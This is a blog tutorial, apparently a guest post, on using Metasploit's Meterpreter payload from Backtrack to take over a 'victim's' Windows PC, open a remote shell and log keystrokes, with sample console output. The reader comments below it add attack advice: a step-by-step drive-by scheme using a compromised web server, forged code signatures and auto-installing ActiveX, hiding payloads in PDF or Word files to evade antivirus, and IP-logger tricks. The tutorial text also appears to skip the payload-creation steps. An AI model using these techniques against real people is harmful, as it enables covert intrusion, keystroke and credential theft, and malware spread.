Note: This is an advanced topic. Read carefully. Feel free to ask any kind of queries. We are always here to help you.

If you are really interested in network security, chances are you have heard of Metasploit over the last few years.

Now, have you ever wondered what someone can do to your PC just by knowing your IP? Here's the answer. He could 0wN you, or in other words, he could have full access to your PC, provided you have just a few security loopholes, which may arise from something as simple as not updating your Flash player last week when it prompted you to do so.

Metasploit is a hacker's best friend, mainly because it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.

The topic of Metasploit is very vast in itself. However, I'll try to keep it basic and simple so that it can be understood by everyone here. Also, Metasploit can be used with several other tools such as Nmap or Nessus (all these tools are present in Backtrack).

In this tutorial, I'll be teaching you how to exploit a system using a Meterpreter payload and start a keylogger on the victim's machine.

Before I go into the details of the Metasploit Framework, let me give you a little idea of some basic terms (they may seem boring at first, but you must know them).

Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited, resulting in notable damage.

Exploit: A piece of software that takes advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.

Overflow: An error caused when a program tries to store data beyond its allocated size. It may be used by an attacker to execute malicious code.

Payload: The actual code which runs on the compromised system after exploitation.

Now, what IS Metasploit?

It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits, and it can also be used to write our own 0-day exploits.

METASPLOIT ANTI-FORENSICS:

Metasploit has a great collection of tools for anti-forensics, making the forensic analysis of the compromised computer a little more difficult. They are released as a part of MAFIA (Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer and Transmogrify.

Metasploit comes in the following versions:

1. CLI (Command Line Interface)

2. Web Interface

3. MSF Console

4. MSFwx

5. MSFAPI

I would recommend using the MSF Console because of its effectiveness and power from a pentester's point of view. Another advantage of this mode is that several sessions of msfconsole can be run simultaneously.

I would recommend doing the following things in Metasploit on Backtrack (a system or image), avoiding the Windows version of the tool.

For those of you who don't know, Backtrack is a Linux distro made especially for security personnel, including all the tools required by a pentester.

Download Backtrack from here. You can download the ISO or the VMware image, according to the one you're comfortable with. If you have physical access to more than one system, then go for the ISO image and install it on your hard disk.

Let the Hacking Begin:

Open up Backtrack. You should see a screen similar to this.

The default login credentials are:

Username: root

Pass: toor

Type in

root@bt:~# /etc/init.d/wicd start

to start the wicd network manager.

Finally, type "startx" to start the GUI mode:

root@bt:~# startx

First of all, know your local IP. Open up a Konsole (on the bottom left of the taskbar) and type in:

root@bt:~# ifconfig

It will be something like 192.168.x.x or 10.x.x.x.

Make a note of it.

Now,

Launch msfconsole by going to Applications >> Backtrack >> Metasploit Engineering Framework >> Framework Version 3 >> msfconsole

You should now have a shell, something similar to a command prompt in Windows.

msf >

Let's now create an executable file which establishes a remote connection between the victim and us, using the Meterpreter payload.

Open another shell window ("Session >> New Shell", or click on the small icon on the left of the shell tab in the bottom left corner of the window).

Now, if you want to start the keylogger on the victim's machine, just type keyscan_start.

Now, if you want a command shell on the victim's computer, just type shell:

meterpreter > shell

Process 5428 created.

Channel 1 created.

Microsoft Windows [Version 6.1.7600]

Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

You will now have a command prompt.

Type in whoami to see the victim's computer name and username:

C:\Windows\system32>whoami

whoami

win7-pc\win 7

C:\Windows\system32>

Let's suppose you want to start Notepad on the victim's computer.

Type in:

Let's say the victim has typed something on his computer.

Just type exit to return to Meterpreter.

Now type in keyscan_dump to see all the captured keystrokes:

meterpreter > keyscan_dump

Dumping captured keystrokes...

GaM3 0V3R

P.S.: The above information is for educational purposes only. You should test it only against computers you own.

About the Author: This is a guest article written by Mr. Aditya Gupta. He is a Cyber Security Expert and C|EH Certified Ethical Hacker. His main expertise includes online privacy issues, web application security and wireless hacking. You can connect with him on Facebook here.

@qwerty VMware is virtualization software. You can run multiple operating systems on the same machine. You don't need dual booting. You can use Backtrack on your current operating system using the Backtrack VMware image.

The ISO image is meant to be burned to a disk so you can install it. Use this if you don't want to run Backtrack on your current OS.

To get the IP, one thing you can do is to use an IP logger PHP script, host it on a free webhost, and ask the user to visit that link. It may sound a little complicated, but trust me, it's really simple.

This one is done in a VM, but how do I carry this out in a real world situation? Should I first port forward or DMZ my VM (BT) machine, then use my local IP or my external IP? Could you please shed some light on this?

Hi friends, help me please. It's all going well and I got a session also, but some problem like:

[*] Started reverse handler on 192.168.255.130:4444
[*] Starting the payload handler...
Now, the payload is listening for all the incoming connections on port 444.
[*] Sending stage (749056 bytes) to 192.168.255.1
[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011

That's it... it's not going any further. When I type session -l it shows command not found...

I have a BT5 live CD, but I'm finding it difficult to configure my HSDPA modem with it. I also have Ubuntu 10.6 dual booting with Windows, and I've successfully configured my modem with Ubuntu. How can I copy the exploiting software from the BT5 live CD to the Ubuntu OS? I'll really appreciate your good response.

It's all about your hard work and some knowledge. If you try to get into someone's PC, it takes 100 tries and only once might you get success... in short, lots of... A LOT... of work required. Do you understand now? In short, 99% of the chances are of failure only.


This won't work for real; are people really this stupid? First off, you have to manually infect a machine. Second, you have to connect to it; it doesn't connect to you.

99% of the time the machines on the net are behind firewalls which means requirement one is out!

99% of the time the machines on the net are behind firewalls which means requirement two is out!

This isn't hacking. If you actually do this at work or on a private network, you WILL GET CAUGHT. This example is a glorified version of VNC with a hidden task tray icon. I wrote a self-installing VNC version, with no tray or installer; it self-installed with a preset password.

If you want to know what a real world example of something like this would be, I'll tell you. 1) Crack any public web server. 2) Build the exact reverse of this example with Meta, so that the exe connects to you when run, then take an MD5 signed piece of trusted code, find the collisions to the hash and copy the cert to your app. Your app also needs to be an ActiveX control, or if you're not that good, make it a ClickOnce... 3) Get a VPS anonymously and set up the listener; set up a bunch and make sure they are all on different ports, or better yet, proxy the inbound connections. 4) Put the signed ActiveX/ClickOnce control on the site so it auto-installs when a browser goes there. 5) Sit on your VPS, or a hacked one, and wait...

That's a real world example which will actually work in the real world, no problem. One tip: when searching for valid signed exes, look at the older apps... new ones are SHA1. That's right, I just told the whole world how to bypass MS security right now, and any time for the next few years, no problem; there isn't a knowledgebase in the world that'll include a CRL for their ROOT CAs... No way at all. Windoz Suckz. 3dge3lite

Very nice tutorial, and clearly intended for pen testing purposes as well. People who want to know what a real hack looks like, try looking at card tricks: it's a bit of show and a good trick, usually. But if you know how it works, it's usually just a few simple steps and a show that fits the situation. Hacking is usually a bit like this: one, most of the time seemingly harmless, entry point gives an opportunity to hack the rest of the system. What you need to know if you want to understand how these hacks work is everything about the software used, and where the vulnerabilities are most likely to be found. The hack is done by the hacker, not by the tools!

Are surfing with proxy websites and IP spoofing the same techniques? If not, why are proxy websites constructed? If any hacker uses a proxy website for cyber crime, will he/she not be traced? Hope that you'll reply to me!

Ok now, author, I'm using Windows 7 on my laptop and I heard that there is some dual OS or something like that. Is it possible for me to have both Linux and Windows on the same laptop? If this is possible, how can I go about doing it? Please mail me at: mymcsi.mymcsiworld@gmail.com

Dual boot is pretty easy. With Windows, defrag your drive first, then resize your Windows partition with GParted or any other partitioning software. Then reboot with the Linux disk and run the installation; make sure you select the empty space and not your Windows partition... done.

Websites log IPs; this is a website; your IP has been logged. This post appears to be a tutorial for newbs; the questions in the comments are likely from newbs. One of the magic things Metasploit is capable of is accessing a computer without the need of manually placing a helper (such as the reverse_tcp.exe file required in the tutorial) on the target machine.

Bring this all together and realize that this page is bait, not a tutorial.

Since I'm testing it on my own hardware, I don't care about anonymity, so can I do this tutorial on the Windows version of Metasploit? I don't want to download Backtrack since bandwidth here is very limited and internet is expensive.

You can use Metasploit to change the signature of the listener, then just hide it in a PDF or Word document and send it. I would recommend uploading it and giving your victim a link rather than sending it via mail, since the antivirus in email is more likely to have up-to-date databases of virus signatures.

Very easy and nice explanation, thanks for uploading a nice tutorial. I request you to post an article on how to know which exploits and payloads are available for a particular Windows operating system, like XP, Windows 7 and Windows 8 etc. Thanks.



I have worked on BT a few years back... I would like to know from the BT team if they can try to make an Android version. I have seen on Google that it shows an ARM build of Android which is heavy. Can the BT team make it lighter to load on Android with less effort...

Will be waiting for a reply with results... Well, thanks for a wonderful tool...